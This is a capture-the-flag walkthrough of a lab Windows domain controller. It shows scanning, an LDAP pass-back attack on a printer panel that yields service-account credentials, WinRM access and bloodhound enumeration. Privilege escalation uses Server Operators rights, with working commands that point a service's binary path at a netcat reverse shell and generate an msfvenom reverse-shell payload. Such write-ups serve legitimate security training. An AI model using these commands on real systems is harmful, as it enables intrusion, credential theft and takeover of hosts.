🧢Copy of Return

rustscan --addresses 10.10.11.108 --ulimit 5000 -- -A -sC -Pn -sV -T 1500

nmap -p- 10.10.11.108 --min-rate 5000

nmap -p 53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001 -sC -sV -oN nmapscan 10.10.11.108 -T5

several open tcp ports such as 53, 88, 389, 636, 3268, 5985, etc. Based on that, we can conclude that the target machine is a Windows domain controller. Nevertheless, we also have port 80 open. Well, let’s start our enumeration with that port, then move on to the other protocols if we find nothing.

HTTP — TCP/80

In this section, we are going to enumerate the web server.

let’s take a quick look at the main webpage

This is the printer admin panel page. Let’s see if we can retrieve the password by inspecting the source code

Password not stored in the source code as clear text

Well, let’s try to intercept the request with Burp after clicking on the Update button

As you can see, a POST request is sent to /settings.php with the IP address specified in the server address input.

So, what happens when we change this IP address with ours?

send the traffic ti repeater and change the kali tunnel ip

let’s run our netcat listener on port 389

Once done, we can then forward the above intercepted request to the server and normally we must receive this response on our machine

We can see that we have a username: return\svc-printer and another string 1edFg43012!! which might be svc-printer’s password. Well, let’s check if this can get an initial access to the target system

for proto in {smb,winrm,wmi,ldap}; do nxc $proto 10.10.11.108 -d return.local -u svc-printer -p '1edFg43012!!'; done

The command is a one-liner that I particularly use always because it checks the authentication on other protocols without having me to execute the command several time with different protocols. the authentication succeeded.

The attack above is called a LDAP Pass-back attack. It’s a common attack against network devices, such as printers. It can be performed when we gain access to a device’s configuration where the LDAP parameters are specified. In an LDAP Pass-back attack, we can modify the default IP to our IP and then test the LDAP configuration, which will force the device (here the printer) to attempt LDAP authentication to our device. We can then intercept this authentication attempt to recover the LDAP credentials.

Let’s try to authenticate to svc-printer account with evil-winrm

evil-winrm -i 10.10.11.108 -u svc-printer -p '1edFg43012!!'

Let’s retrieve the user flag - b5e473c1a2888bcf0a8759cfbb569dce

Post Exploitation

In this section, we will try to move laterally and escalate our privileges.

Let’s first download the domain information using bloodhound-python

bloodhound-python -d return.local -u svc-printer -p '1edFg43012!!' -ns 10.10.11.108 -c all

bloodhound-python -d return.local -u svc-printer -p '1edFg43012!!' -ns 10.10.11.108 -c all --zip

Once done, you can launch bloodhound, then upload the domain information in bloodhound

┌──(root㉿kali)-[~/machines/Return] └─# bloodhound

I took a look at bloodhound’s pre-built analytics queries but found only this path

The Server Operator exploit is a commonly overlooked attack path that can provide SYSTEM-level access in Windows environments.

Being a member of server operator group is not a vulnerability, but the member of this group has special privileges to make changes in the domain which could lead an attacker to escalate to system privilege. We listed services running on the server by issuing “services” command in our terminal where we can see list of services are there.

Exploitation Method 1

we transferred netcat.exe binary to the compromised host and changed the binary path of the service. The reason we are changing the binary path is to receive a reverse connection as system user from the compromised hosts.

How it works?

When we start any service then it will execute the binary from its binary path. So if we replace the service binary with netcat or reverse shell binary. Then, it will give us a reverse shell as a system user because the service is starting as a system on the compromised host. Please note, we need to specify the attacker’s IP address and listening port number with the netcat binary.

To do that, we will first list the services running on our target machine, then we will change one of the service’s binary path

upload /usr/share/windows-resources/binaries/nc.exe
sc.exe config VMTools binPath="C:\Users\svc-printer\Documents\nc.exe -e cmd.exe 10.10.16.4 443"

Exploitation Method 2

In this method, we are going to use Metasploit reverse shell binary instead of using nc.exe. Let’s create a msfvenom reverse shell binary and save it as shell.exe. Let’s break out the commands we used to create msfvenom reverse shell binary payload. Here we have selected payload type which is based on the target host operating system (windows/x64/shell_reverse_tcp), then lhost and lport which is listening to host (Attacker IP) and listening port (8888) in our case, lastly, we issue filetype with -f flag which will save our payload in exe format and saved it as shell.exe.

msfvenom -p windows/x64/shell/reverse_tcp lhost=10.10.16.4 lport=8888 -f exe > shell.exe

Once we create the reverse shell payload binary then we will upload it to the compromised system. We have our binary saved in the in the root directory, it is possible that it might be different in your case.